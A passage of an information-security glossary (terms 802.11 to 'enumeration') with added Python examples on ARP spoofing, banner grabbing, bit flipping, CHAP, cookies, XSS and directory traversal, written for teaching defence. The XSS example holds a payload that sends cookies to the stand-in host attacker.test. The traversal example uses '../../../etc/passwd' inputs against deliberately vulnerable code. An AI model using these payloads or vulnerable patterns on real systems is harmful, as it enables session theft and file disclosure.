GLOSSARY  

802.11   Wireless LAN standards created by IEEE. 802.11a runs at up to 54 Mbps at 5 GHz, 802.11b runs at up to 11 Mbps at 2.4 GHz, 802.11g runs at up to 54 Mbps at 2.4 GHz, and 802.11n can run upward of 150 Mbps.

802.11i   The IEEE amendment that defines wireless LAN security; the Wi-Fi Alliance certifies implementations of it as WPA2. It specifies Temporal Key Integrity Protocol (TKIP) for backward compatibility with WEP-era hardware and CCMP, a mode built on the Advanced Encryption Standard (AES), as the mandatory cipher.

acceptable use policy (AUP)   Policy stating what users of a system can and cannot do with the organization’s assets.

access control list (ACL)   A method of defining what rights and permissions an entity has to a given resource. In networking, access control lists are commonly associated with firewall and router traffic-filtering rules.

access creep   Occurs when authorized users accumulate excess privileges on a system because of moving from one position to another; allowances accidentally remain with the account from position to position.

access point (AP)   A wireless LAN device that acts as a central point for all wireless traffic. The AP is connected to both the wireless LAN and the wired LAN, providing wireless clients access to network resources.

accountability   The ability to trace actions performed on a system to a specific user or system entity.

acknowledgment (ACK)   A TCP flag indicating that the acknowledgment number field in the header is valid. The receiver sets it to tell the originating station that all bytes up to that sequence number have been received.

active attack   An attack that is direct in nature—usually where the attacker injects something into, or otherwise alters, the network or system target.

Active Directory (AD)   The directory service created by Microsoft for use on its networks. It provides a variety of network services using Lightweight Directory Access Protocol (LDAP), Kerberos-based authentication, and single sign-on for user access to network-based resources.

active fingerprinting   Injecting traffic into the network to identify the operating system of a device.

ad hoc mode   A mode of operation in a wireless LAN in which clients send data directly to one another without utilizing a wireless access point (WAP), much like a point-to-point wired connection.

Address Resolution Protocol (ARP)   A protocol used to map a known IP address to a physical (MAC) address on the local network segment. It is defined in RFC 826. The ARP table (or cache) is a list of IP addresses and corresponding MAC addresses stored on a local computer. ARP carries no authentication, so a forged reply can overwrite a cache entry; this is the basis of ARP spoofing (poisoning).
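The following is an added example, not part of the glossary: it parses an ARP table in the format printed by `arp -a` on Linux and applies two checks a responder would run when ARP poisoning is suspected. The table contents and the baseline gateway MAC are constructed for the demonstration.

```python
"""Added example: ARP cache checks for spoofing indicators.
The sample table and the baseline gateway MAC below are constructed."""
import re
from collections import defaultdict

# Constructed `arp -a` output (Linux format). The gateway's cached MAC
# differs from the recorded baseline, and the same MAC also answers for
# 192.168.1.77: two classic signs that a host is poisoning the cache.
SAMPLE_ARP_A = """\
gateway (192.168.1.1) at aa:bb:cc:dd:ee:99 [ether] on eth0
printer (192.168.1.20) at aa:bb:cc:dd:ee:01 [ether] on eth0
? (192.168.1.77) at aa:bb:cc:dd:ee:99 [ether] on eth0
nas (192.168.1.30) at aa:bb:cc:dd:ee:02 [ether] on eth0
"""
GATEWAY_IP = "192.168.1.1"
KNOWN_GATEWAY_MAC = "00:11:22:33:44:55"   # constructed baseline recorded on a healthy network

ARP_LINE = re.compile(
    r"\((?P<ip>\d{1,3}(?:\.\d{1,3}){3})\) at (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.IGNORECASE,
)

def parse_arp_table(text):
    """Return {ip: mac} from `arp -a` style output; non-matching lines are ignored."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.search(line)
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table

def find_duplicate_macs(table):
    """Return {mac: [ips]} for every MAC address claimed by more than one IP."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

def gateway_matches_baseline(table, gateway_ip, expected_mac):
    """Compare the cached gateway MAC against a known-good value."""
    return table.get(gateway_ip, "") == expected_mac.lower()

if __name__ == "__main__":
    t = parse_arp_table(SAMPLE_ARP_A)
    print("duplicate MACs:", find_duplicate_macs(t))
    print("gateway MAC unchanged:", gateway_matches_baseline(t, GATEWAY_IP, KNOWN_GATEWAY_MAC))
```

Both checks are heuristics: a legitimate host with several IP aliases also shows one MAC for several IPs, so the gateway comparison against a recorded baseline is the stronger signal.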

adware   Software that has advertisements embedded within it. It generally displays ads in the form of pop-ups.

algorithm   A step-by-step method of solving a problem. In computing security, an algorithm is a set of mathematical rules (logic) for the process of encryption and decryption.

annualized loss expectancy (ALE)   The monetary loss an organization can expect from a given risk to an asset over a one-year period. ALE is the product of the annualized rate of occurrence (ARO) and the single loss expectancy (SLE): ALE = ARO × SLE.

annualized rate of occurrence (ARO)   An estimate of the number of times during a year a particular asset would be lost or experience downtime.

anonymizer   A device or service designed to obfuscate traffic between a client and the Internet. It is generally used to make activity on the Internet as untraceable as possible.

antivirus (AV) software   An application that monitors a computer or network to identify, and prevent, malware. AV is usually signature-based and can take multiple actions on defined malware files/activity.

Application layer   Layer 7 of the OSI reference model. The Application layer provides services to applications to allow them access to the network. Protocols such as FTP and SMTP reside here.

application-level attacks   Attacks on the actual programming code of an application.

archive   A collection of historical records or the place where they are kept. In computing, an archive generally refers to backup copies of logs and/or data.

assessment   Activities to determine the extent to which a security control is implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for the system.

asset   Any item of value or worth to an organization, whether physical or virtual.

asymmetric   Literally, “not balanced or the same.” In computing, asymmetric refers to a difference in networking speeds upstream to downstream. In cryptography, it’s the use of more than one key for encryption/authentication purposes.

asymmetric algorithm   In computer security, an algorithm that uses a mathematically related key pair rather than a single shared key: what one key encrypts, only the other can decrypt. The public key may be distributed freely; the private key must remain secret.

asynchronous   1. The lack of clocking (imposed time ordering) on a bit stream. 2. An industry term referring to an implant or malware that does not require active interaction from the attacker.

asynchronous transmission   The transmission of digital signals without precise clocking or synchronization.

audit   Independent review and examination of records and activities to assess the adequacy of system controls, to ensure compliance with established policies and operational procedures, and to recommend necessary changes.

audit data   Chronological record of system activities to enable the reconstruction and examination of the sequence of events and changes in an event.

audit trail   A record showing which user has accessed a given resource and what operations the user performed during a given period.

auditing   The process of recording activity on a system for monitoring and later review.

authentication   The process of determining whether a network entity (user or service) is legitimate—usually accomplished through a user ID and password. Authentication measures are categorized by something you know (user ID and password), something you have (smart card or token), or something you are (biometrics).

authentication, authorization, and accounting (AAA)   Authentication confirms the identity of the user or device. Authorization determines the privileges (rights) of the user or device. Accounting records the access attempts, both successful and unsuccessful.

authentication header (AH)   An Internet Protocol Security (IPSec) protocol that provides integrity, data-origin authentication, and optional anti-replay protection for a packet, verifying that its contents were not modified in transit. AH provides no confidentiality; the payload is authenticated, not encrypted.

authenticity   Sometimes included as a security element, authenticity refers to the characteristic of data that ensures it is genuine.

authorization   The granting of rights or privileges to an authenticated person or entity; it determines what that entity is allowed to do once its identity has been established.

availability   The condition of a resource being ready for use and accessible by authorized users.

backdoor   A hidden capability in a system or program for bypassing normal computer authentication systems. A backdoor can be purposeful or the result of malware or other attack.

banner grabbing   An enumeration technique in which the tester connects to a service and records the banner it volunteers (for example, an SSH identification string or an HTTP Server header) to identify the software, its version, and often the underlying operating system (fingerprinting).
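An added example (not from the glossary) of the technique: a small grabber that connects, reads whatever the service sends first, and parses an SSH identification string. To run offline it starts a stand-in server on a loopback port whose banner text is constructed; the hostname and port are whatever that server is assigned.

```python
"""Added example: grab and parse a service banner.
The server below is a local stand-in so the example runs offline;
its banner string is constructed, not captured from a real host."""
import re
import socket
import threading

# Constructed SSH identification string in the RFC 4253 format a server sends on connect.
FAKE_BANNER = b"SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.6\r\n"

def start_fake_server(banner):
    """Listen on an ephemeral loopback port, send `banner` to one client, then exit.
    Returns the port number."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(banner)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]

def grab_banner(host, port, timeout=2.0, max_bytes=1024):
    """Connect and read what the service sends before the client says anything."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        try:
            data = s.recv(max_bytes)
        except socket.timeout:
            data = b""   # silent services (e.g. HTTP) only answer after a request
    return data.decode("utf-8", errors="replace").strip()

SSH_BANNER = re.compile(r"^SSH-(?P<proto>[\d.]+)-(?P<software>\S+)(?:\s+(?P<comment>.*))?$")

def parse_ssh_banner(banner):
    """Split an SSH identification string into protocol version, software and comment;
    returns None when the banner is not SSH."""
    m = SSH_BANNER.match(banner)
    if not m:
        return None
    return {"proto": m.group("proto"), "software": m.group("software"),
            "comment": m.group("comment") or ""}

if __name__ == "__main__":
    port = start_fake_server(FAKE_BANNER)
    banner = grab_banner("127.0.0.1", port)
    print(banner)
    print(parse_ssh_banner(banner))
```

Banners are self-reported and can be altered or removed by the administrator, so they are a lead to confirm with other fingerprinting, not proof of version.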

baseline   A point of reference used to mark an initial state in order to manage change.

bastion host   A computer placed outside a firewall to provide public services to other Internet sites and hardened to resist external attacks.

biometrics   A measurable, physical characteristic used to recognize the identity, or to verify the claimed identity, of an applicant. Facial images, fingerprints, and handwriting samples are all examples of biometrics.

bit flipping   A cryptographic attack where bits are manipulated in the cipher text to generate a predictable outcome in the plain text once it is decrypted.
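The following added example, which is not part of the glossary, shows the attack against a stream cipher (or any CTR-style mode): because cipher text is plain text XOR keystream, flipping a bit in the cipher text flips the same bit in the decrypted plain text. The keystream generator is a SHA-256 counter construction standing in for a real cipher, and the keys, nonce and message are constructed; the second half shows why a MAC over the cipher text defeats the attack.

```python
"""Added example: bit flipping against unauthenticated XOR encryption,
and the encrypt-then-MAC check that catches it. The keystream generator
is a SHA-256 counter construction used only as a stand-in for a cipher."""
import hashlib
import hmac
import os

def keystream(key, nonce, length):
    """Deterministic keystream: SHA-256(key || nonce || counter) blocks, truncated."""
    out, counter = b"", 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]

def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def encrypt(key, nonce, plaintext):
    return xor_bytes(plaintext, keystream(key, nonce, len(plaintext)))

decrypt = encrypt   # XOR is its own inverse

def flip(ciphertext, offset, known, wanted):
    """Attacker step, no key needed: since c = p XOR k and p == known at `offset`,
    c XOR known XOR wanted decrypts to `wanted` in that position."""
    assert len(known) == len(wanted)
    segment = ciphertext[offset:offset + len(known)]
    patched = xor_bytes(xor_bytes(segment, known), wanted)
    return ciphertext[:offset] + patched + ciphertext[offset + len(known):]

def seal(key, mac_key, nonce, plaintext):
    """Encrypt-then-MAC: the tag covers the nonce and the cipher text."""
    ct = encrypt(key, nonce, plaintext)
    tag = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    return ct, tag

def open_sealed(key, mac_key, nonce, ct, tag):
    """Verify the tag (constant-time compare) before decrypting; None means tampered."""
    expected = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        return None
    return decrypt(key, nonce, ct)

def demo():
    key, mac_key, nonce = os.urandom(32), os.urandom(32), os.urandom(12)
    msg = b"user=alice;amount=0100;to=bob"          # constructed message
    ct, tag = seal(key, mac_key, nonce, msg)
    off = msg.index(b"amount=") + len(b"amount=")   # attacker knows the layout, not the key
    tampered = flip(ct, off, b"0100", b"9999")
    return {
        "unauthenticated": decrypt(key, nonce, tampered),           # attack succeeds
        "authenticated": open_sealed(key, mac_key, nonce, tampered, tag),  # rejected
        "genuine": open_sealed(key, mac_key, nonce, ct, tag),       # still accepted
    }

if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:16} {v!r}")
```

The same property holds for CBC mode (a flipped cipher-text bit flips the matching plain-text bit in the next block and garbles the current one), which is why authenticated modes such as AES-GCM, or a MAC over the cipher text, are required in practice.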

black hat   An attacker who breaks into computer systems with malicious intent, without the owner’s knowledge or permission.

black-box testing   In penetration testing, a method of testing the security of a system or subnet without any previous knowledge of the device or network. It is designed to simulate an attack by an outside intruder (usually from the Internet).

block cipher   A symmetric key cryptographic algorithm that transforms a block of information at a time using a cryptographic key. For a block cipher algorithm, the length of the input block is the same as the length of the output block.

Blowfish   A symmetric block cipher designed by Bruce Schneier. It operates on 64-bit blocks with a variable-length key that can range from 32 bits to 448 bits.

BlueBorne attack   A set of Bluetooth implementation vulnerabilities disclosed in 2017 that allow an attacker within radio range to take control of a device without pairing with it and without any user interaction.

Bluejacking   Sending unsolicited messages over Bluetooth to Bluetooth-enabled devices such as mobile phones, tablets, and laptop computers.

Bluesnarfing   Unauthorized access to information such as calendars, contact lists, e-mails, and text messages on a wireless device through a Bluetooth connection.

Bluetooth   A short-range wireless technology standard, managed by the Bluetooth Special Interest Group, used for transferring data between fixed and mobile devices.

boot sector virus   A virus that plants itself in a system’s boot sector and infects the master boot record.

brute-force password attack   A method of password cracking in which every candidate in the keyspace is tried systematically until a match is found. Against a live login the attack is slow, noisy, and easy to detect and rate-limit; against a captured hash it runs offline at whatever speed the attacker's hardware allows, so the keyspace that is feasible to search depends on password length and on how expensive the hash function is.

buffer   A portion of memory used to temporarily store output or input data.

buffer overflow   A condition that occurs when more data is written to a buffer than it has space to store, which results in data corruption or other system errors. This is usually because of insufficient bounds checking, a bug, or improper configuration in the program code.

bug   A software or hardware defect that often results in system vulnerabilities.

business continuity plan (BCP)   A set of plans and procedures to follow in the event of a failure or a disaster—security related or not—to get business services back up and running. BCPs include a disaster recovery plan (DRP) that addresses exactly what to do to recover any lost data or services.

business impact analysis (BIA)   An organized process to gauge the potential effects of an interruption to critical business operations as a result of a disaster, accident, or emergency.

cache   A storage buffer that transparently stores data so future requests for the same data can be served faster.

CAM table   Content addressable memory table. A CAM table holds all the MAC-address-to-port mappings on a switch.

certificate   A signed data structure that binds a public key to the identity of its holder; also known as a digital certificate. Certificates contain the entity’s public key, serial number, version, subject, signature algorithm, issuer, validity dates, and key usage details, and are signed by a certificate authority (CA) so that relying parties can verify the binding.

certificate authority (CA)   A trusted entity that issues and revokes public key certificates. In a network, a CA is a trusted entity that issues, manages, and revokes security credentials and public keys for message encryption and/or authentication. Within a public key infrastructure (PKI), the CA works with registration authorities (RAs) to verify information provided by the requestor of a digital certificate.

Challenge Handshake Authentication Protocol (CHAP)   An authentication method for point-to-point links, defined in RFC 1994, using a three-way handshake: the authenticator sends a random challenge, the peer returns an MD5 hash of the challenge combined with a shared secret, and the authenticator compares that with its own computation. The secret itself never crosses the link, and a fresh challenge each time defeats replay.
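The exchange described above, simulated with both sides in one process as an added example that is not part of the glossary. The response computation follows RFC 1994 (MD5 over the identifier octet, the secret and the challenge); the peer name, secret and identifiers are constructed.

```python
"""Added example: the CHAP challenge/response exchange from RFC 1994.
Peer names, secrets and identifiers are constructed for the demonstration."""
import hashlib
import hmac
import os

def chap_response(identifier, secret, challenge):
    """RFC 1994 response value: MD5(identifier octet || shared secret || challenge)."""
    return hashlib.md5(bytes([identifier]) + secret + challenge).digest()

class Authenticator:
    """Holds the secret table, issues challenges and checks responses."""
    def __init__(self, secrets):
        self.secrets = secrets        # peer name -> shared secret (bytes)
        self.outstanding = {}         # identifier -> challenge awaiting a response

    def challenge(self, identifier):
        c = os.urandom(16)            # fresh, unpredictable challenge every time
        self.outstanding[identifier] = c
        return c

    def verify(self, identifier, name, response):
        c = self.outstanding.pop(identifier, None)   # single use: a replay finds no challenge
        secret = self.secrets.get(name)
        if c is None or secret is None:
            return False
        return hmac.compare_digest(chap_response(identifier, secret, c), response)

class Peer:
    """The side proving knowledge of the secret."""
    def __init__(self, name, secret):
        self.name, self.secret = name, secret

    def respond(self, identifier, challenge):
        return self.name, chap_response(identifier, self.secret, challenge)

def run_exchange(peer, auth, identifier):
    """Challenge -> Response -> Success/Failure. Returns (accepted, wire), where
    `wire` is everything an eavesdropper on the link would observe."""
    challenge = auth.challenge(identifier)
    name, response = peer.respond(identifier, challenge)
    accepted = auth.verify(identifier, name, response)
    return accepted, {"challenge": challenge, "name": name, "response": response}

def demo():
    auth = Authenticator({"alice": b"correct-horse"})
    ok, wire = run_exchange(Peer("alice", b"correct-horse"), auth, identifier=1)
    bad, _ = run_exchange(Peer("alice", b"wrong-secret"), auth, identifier=2)
    replayed = auth.verify(1, wire["name"], wire["response"])   # captured response re-sent
    leaked = b"correct-horse" in wire["response"]
    return {"accepted": ok, "wrong_secret": bad, "replay": replayed, "secret_on_wire": leaked}

if __name__ == "__main__":
    print(demo())
```

Note the trade-off the protocol makes: because the authenticator must compute the same MD5 value, it has to store each peer's secret in recoverable form, so the secret table itself is a high-value target.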

CIA triad   Confidentiality, integrity, and availability. These are the three fundamental aspects of security.

cipher text   Text or data in its encrypted form; the result of plain text being input into a cryptographic algorithm.

client   A computer process that requests a service from another computer and accepts the server’s responses.

cloning   A cell phone attack in which the serial number from one cell phone is copied to another in an effort to copy the cell phone.

CNAME record   A Canonical Name record within DNS, used to provide an alias for a domain name.

cold site   A backup facility with the electrical and physical components of a computer facility, but with no computer equipment in place. The site is ready to receive the necessary replacement computer equipment in the event the user has to move from his main computing location to an alternate site.

collision   In regard to hash algorithms, a collision occurs when two or more distinct inputs produce the same output.

collision domain   A domain composed of all the systems sharing any given physical transport media. Systems within a collision domain may collide with each other during the transmission of data. Collisions can be managed by CSMA/CD (collision detection) or CSMA/CA (collision avoidance).

Common Internet File System/Server Message Block   An Application layer protocol used primarily by Microsoft Windows to provide shared access to printers, files, and serial ports. It also provides an authenticated interprocess communication mechanism.

community cloud   A cloud model where the infrastructure is shared by several organizations, usually with the same policy and compliance considerations.

community string   A string used for authentication in SNMPv1 and SNMPv2c. By convention the public community string grants read-only access, whereas the private community string grants read-write. Community strings are transmitted in clear text and can be sniffed off the wire. SNMPv3 replaces them with a user-based security model that provides authentication and encryption, along with other improvements and options.

competitive intelligence   Freely and readily available information on an organization that can be gathered by a business entity about its competitor’s customers, products, and marketing. It can be used by an attacker to build useful information for further attacks.

Computer Emergency Response Team (CERT)   Name given to expert groups that handle computer security incidents.

computer-based attack   A social engineering attack using computer resources such as e-mail and IRC.

confidentiality   A security objective that ensures a resource can be accessed only by authorized users. This is also the security principle that stipulates sensitive information is not disclosed to unauthorized individuals, entities, or processes.

console port   Physical socket provided on routers and switches for cable connections between a computer and the router/switch. This connection enables the computer to configure, query, and troubleshoot the router/switch by use of a terminal emulator and a command-line interface.

contingency plan   Management policies and procedures designed to maintain or restore business operations, including computer operations, possibly at an alternate location, in the event of an emergency, system failure, or disaster.

cookie   A small name/value record that a web server sets in a browser (through the Set-Cookie header) and that the browser returns on later requests to the same site. Cookies maintain state across stateless HTTP requests; session cookies in particular carry authentication state, which makes them a target for theft. Attributes such as Secure (send only over HTTPS), HttpOnly (hide from page scripts), SameSite (limit cross-site sending), and an expiration date control how a cookie is stored and when it is returned.
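An added example, not part of the glossary, of the check a reviewer makes against the attributes named above: it parses Set-Cookie headers and reports which protective attributes are missing. The headers, cookie names and values are constructed; the list of "sensitive" name fragments is an assumption for the demonstration.

```python
"""Added example: audit Set-Cookie headers for missing protective attributes.
The sample headers below are constructed, not captured from any real site."""

SAMPLE_HEADERS = [
    "sessionid=8f3a9c; Path=/; HttpOnly; Secure; SameSite=Strict",
    "prefs=dark; Path=/; Expires=Wed, 01 Jan 2031 00:00:00 GMT",
    "authtoken=eyJhbGci; Path=/; SameSite=None; Secure",
    "csrf=abc123; Path=/; HttpOnly",
]

# Assumed name fragments that mark a cookie as carrying authentication state.
SENSITIVE_NAME_PARTS = ("session", "auth", "token", "csrf")

def parse_set_cookie(header):
    """Split one Set-Cookie value into name, value and a dict of lower-cased attributes.
    Flag attributes (Secure, HttpOnly) map to True; valued ones keep their string."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.lower()] = val if val else True
    return {"name": name, "value": value, "attrs": attrs}

def audit_cookie(cookie):
    """Return a list of findings for one parsed cookie; an empty list means no issue found."""
    a = cookie["attrs"]
    findings = []
    if "secure" not in a:
        findings.append("missing Secure: cookie is also sent over plain HTTP")
    if "httponly" not in a:
        findings.append("missing HttpOnly: readable by page scripts (XSS exposure)")
    samesite = a.get("samesite")
    if samesite is None:
        findings.append("missing SameSite: browser default applies")
    elif str(samesite).lower() == "none" and "secure" not in a:
        findings.append("SameSite=None without Secure: rejected by modern browsers")
    persistent = "expires" in a or "max-age" in a
    sensitive = any(s in cookie["name"].lower() for s in SENSITIVE_NAME_PARTS)
    if persistent and sensitive:
        findings.append("persistent sensitive cookie: survives browser close")
    return findings

def audit_headers(headers):
    """Map each cookie name to its findings."""
    return {c["name"]: audit_cookie(c) for c in map(parse_set_cookie, headers)}

if __name__ == "__main__":
    for name, findings in audit_headers(SAMPLE_HEADERS).items():
        print(name, "->", findings or "ok")
```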

copyright   A set of exclusive rights granted by the law of a jurisdiction to the author or creator of an original work, including the right to copy, distribute, and adapt the work.

corrective controls   Controls internal to a system designed to resolve vulnerabilities and errors soon after they arise.

countermeasures   Actions, devices, procedures, techniques, or other measures intended to reduce the vulnerability of an information system.

covert channel   A communications channel that is being used for a purpose it was not intended for, usually to transfer information secretly.

cracker   A cyberattacker who acts without permission from, and gives no prior notice to, the resource owner. This is also known as a malicious hacker.

crossover error rate (CER)   A comparison metric for biometric devices and technologies. The CER is the point at which the false acceptance rate (FAR) equals the false rejection rate (FRR). As a device’s matching threshold is tightened, its FAR decreases while its FRR increases; the CER is the point at which these two rates are equal, or cross over, and a lower CER indicates a more accurate system.

cross-site scripting (XSS)   An attack in which the attacker injects script (typically JavaScript) into a web page that the application then serves to other users. The script may be reflected back from a request parameter (often delivered in a link the victim clicks), stored in the application’s data, or introduced on the client side through the DOM. Because the browser treats the injected script as part of the trusted page, it runs in the victim’s session and can read cookies, alter page content, or send requests on the victim’s behalf.
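As an added example (not from the glossary), the reflected case above in miniature: a handler that concatenates a query parameter into HTML beside one that escapes it for the HTML text context first. The page template, the attacker's payload and the host name in it are constructed.

```python
"""Added example: a reflected XSS sink and its escaped counterpart.
The template, payload and attacker host name are constructed."""
import html
from urllib.parse import parse_qs

def _query_param(query_string, name="q"):
    return parse_qs(query_string).get(name, [""])[0]

def render_unsafe(query_string):
    """Vulnerable: the decoded `q` parameter is interpolated straight into the markup."""
    return f"<p>Results for: {_query_param(query_string)}</p>"

def render_escaped(query_string):
    """Hardened: escape <, >, &, quotes for the HTML text context before interpolating."""
    return f"<p>Results for: {html.escape(_query_param(query_string), quote=True)}</p>"

# Constructed payload as it would appear URL-encoded in a link sent to the victim:
# <script>document.location='http://attacker.test/?'+document.cookie</script>
PAYLOAD = ("q=%3Cscript%3Edocument.location%3D%27http%3A//attacker.test/%3F%27"
           "%2Bdocument.cookie%3C/script%3E")

def contains_script_tag(markup):
    """Crude check used to demonstrate the difference between the two renderers."""
    return "<script" in markup.lower()

if __name__ == "__main__":
    print(render_unsafe(PAYLOAD))
    print(render_escaped(PAYLOAD))
```

Escaping is context dependent: the HTML-text escaping shown here is not sufficient for data placed inside an attribute, a script block, or a URL, each of which needs its own encoding.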

crypter   A software tool that uses a combination of encryption and code manipulation to render malware undetectable to AV and other security-monitoring products.

cryptographic key   A value used to control cryptographic operations, such as decryption, encryption, signature generation, and signature verification.

cryptography   The science or study of protecting information, whether in transit or at rest, by using techniques to render the information unusable to anyone who does not possess the means to decrypt it.

daemon   A background process found in Unix, Linux, Solaris, and other Unix-based operating systems.

daisy chaining   A method of external testing whereby several systems or resources are used together to make an attack.

Data Encryption Standard (DES)   An outdated symmetric block cipher with a 64-bit block and an effective 56-bit key, previously approved by the U.S. government and used by business and civilian government agencies. DES is no longer considered secure because the entire keyspace can be searched exhaustively with modern computing, making the encryption easy to crack.

Data Link layer   Layer 2 of the OSI reference model. This layer provides reliable transit of data across a physical link. The Data Link layer is concerned with physical addressing, network topology, access to the network medium, error detection, sequential delivery of frames, and flow control. The Data Link layer is composed of two sublayers: the MAC and the LLC.

database   An organized collection of data.

decryption   The process of transforming cipher text into plain text through the use of a cryptographic algorithm.

defense in depth   An information assurance strategy in which multiple layers of defense are placed throughout an information technology system.

demilitarized zone (DMZ)   A network segment placed between the untrusted Internet and the trusted internal network, separated from both by firewall policy. Systems that must be reachable from the public (such as a web server) but that also need limited access to trusted resources (such as a database) are placed here. The point is that a compromised public host does not sit directly on the internal network, and the inside firewall component guarding the trusted resources can apply strict rules about which DMZ addresses may reach which internal services, without having to trust that those addresses were not forged by outsiders.

denial of service (DoS)   An attack with the goal of preventing authorized users from accessing services and preventing the normal operation of computers and networks.

detective controls   Controls to detect anomalies or undesirable events occurring on a system.

digital certificate   Also known as a public key certificate, a digital certificate is an electronic file that is used to verify a user’s identity, providing nonrepudiation throughout the system. Certificates contain the entity’s public key, serial number, version, subject, algorithm type, issuer, valid dates, and key usage details.

digital signature   The result of applying a signing algorithm with the originator’s private key to the hash of a message within a PKI system. Anyone holding the corresponding public key can verify the signature, which confirms that the message came from the key holder and was not altered, and provides nonrepudiation. (With RSA this is often described as “encrypting the hash with the private key”; that description does not carry over to other signature schemes.)

digital watermarking   The process of embedding information into a digital signal in a way that makes it difficult to remove.

directory traversal attack   Also known as the dot-dot-slash attack. The attacker supplies path components such as ../ (often URL-encoded as %2e%2e%2f, or double-encoded to slip past a single decoding step) in a file name or URL parameter so that the server resolves a path outside the directory it intended to serve. This exposes files such as configuration or password files and, in some cases, allows commands to be executed outside the intended web server directories.
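An added example that is not part of the glossary: a file-path resolver that falls to the attack beside one that decodes, normalises and then confirms the result stays under the document root. The document root and request paths are constructed; nothing is read from disk.

```python
"""Added example: traversal-vulnerable path resolution beside a hardened version.
DOC_ROOT and the request paths are constructed; no file is opened."""
import posixpath
from urllib.parse import unquote

DOC_ROOT = "/var/www/html"   # assumed document root for this example

def resolve_unsafe(requested):
    """Vulnerable: the user-supplied path is joined under the root and normalised.
    '..' components walk back out of DOC_ROOT and the result is used as-is."""
    return posixpath.normpath(posixpath.join(DOC_ROOT, unquote(requested).lstrip("/")))

def resolve_safe(requested):
    """Hardened: decode twice (to defeat double encoding), normalise backslashes,
    collapse '..' and then require the result to remain inside DOC_ROOT."""
    decoded = unquote(unquote(requested)).replace("\\", "/")
    candidate = posixpath.normpath(posixpath.join(DOC_ROOT, decoded.lstrip("/")))
    root_prefix = DOC_ROOT.rstrip("/") + "/"   # prefix check must include the slash
    if candidate != DOC_ROOT and not candidate.startswith(root_prefix):
        raise PermissionError(f"path escapes document root: {requested!r}")
    return candidate

def is_within_root(requested):
    """Boolean form of resolve_safe for callers that prefer a check to an exception."""
    try:
        resolve_safe(requested)
        return True
    except PermissionError:
        return False

if __name__ == "__main__":
    for p in ("images/logo.png", "../../../etc/passwd", "%252e%252e/etc/passwd"):
        print(f"{p:30} unsafe -> {resolve_unsafe(p):28} safe -> {is_within_root(p)}")
```

The trailing slash in the prefix check matters: without it a sibling directory such as /var/www/html-old would pass as "inside" /var/www/html. In production the candidate should also be resolved with symlinks followed (os.path.realpath) before the containment check.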

disaster recovery plan (DRP)   A documented set of procedures to recover business infrastructures in the event of a disaster.

discretionary access control (DAC)   The basis of this kind of security is that an individual user, or program operating on the user’s behalf, is allowed to specify explicitly the types of access other users (or programs executing on their behalf) may have to information under the user’s control.

distributed DoS (DDoS)   A denial-of-service technique that uses numerous hosts to perform the attack.

DNS enumeration   The process of using easily accessible DNS records to map a target network’s internal hosts.

domain name   A unique name used to identify resources on the Internet. Read from right to left, a name descends a hierarchy from the root (.) through a top-level domain (.com, .gov, or .mil, for example) to the organization’s own namespace and finally to individual hosts.

Domain Name System (DNS)   A distributed, hierarchical system of servers that translates human-friendly domain names into numeric Internet Protocol (IP) addresses, and vice versa.

Domain Name System (DNS) cache poisoning   An attack technique that tricks your DNS server into believing it has received authentic information when, in reality, it has been provided fraudulent data. DNS cache poisoning affects user traffic by sending it to erroneous or malicious endpoints instead of its intended destination.

Domain Name System (DNS) lookup   The process of a system providing a fully qualified domain name (FQDN) to a local name server, for resolution to its corresponding IP address.

doxing   The process of searching for and publishing private information about a target (usually an individual) on the Internet, typically with malicious intent.

droppers   Malware designed to install some sort of virus, backdoor, and so on, on a target system.

due care   A term representing the responsibility managers and their organizations have to provide information security to ensure the type of control, the cost of control, and the deployment of control are appropriate for the system being managed.

due diligence   Steps taken to identify and limit risks to an acceptable or reasonable level of exposure.

dumpster diving   A physical security attack where the attacker sifts through garbage and recycle bins for information that may be useful on current and future attacks.

eavesdropping   The act of secretly listening to the private conversations of others without their consent. This can also be done over telephone lines (wiretapping), e-mail, instant messaging, and other methods of communication considered private.

ECHO reply   A type 0 ICMP message used to reply to ECHO requests. It is used with ping to verify Network layer connectivity between hosts.

EDGAR database   A system used by the Securities and Exchange Commission (SEC) for companies and businesses to transmit required filings and information. The EDGAR database performs automated collection, validation, indexing, acceptance, and forwarding of submissions by companies and others who are required by law to file forms with the U.S. Securities and Exchange Commission. The database is freely available to the public via the Internet and is a potential source of information for hackers.

Electronic Code Book (ECB)   A mode of operation for a block cipher in which each block is encrypted independently, so that under a given key each possible block of plain text has a fixed corresponding cipher-text value, and vice versa. Because identical plain-text blocks produce identical cipher-text blocks, ECB leaks patterns in the data and should not be used for more than a single block.

electronic serial number   Created by the U.S. Federal Communications Commission to uniquely identify mobile devices; often represented as an 11-digit decimal number or 8-digit hexadecimal number.

encapsulation   The process of wrapping a unit of data with a protocol header (and, at Layer 2, a trailer) before transmission on the network. It occurs at each layer of the OSI reference model: each layer’s output becomes the payload of the layer below it.

encryption   Conversion of plain text to cipher text through the use of a cryptographic algorithm.

end user licensing agreement (EULA)   A software license agreement; a contract between the “licensor” and purchaser establishing the right to use the software.

Enterprise Information Security Architecture (EISA)   A collection of requirements and processes that help determine how an organization’s information systems are built and how they work.

enumeration   In penetration testing, enumeration is the act of querying a device or network segment thoroughly and systematically for information.

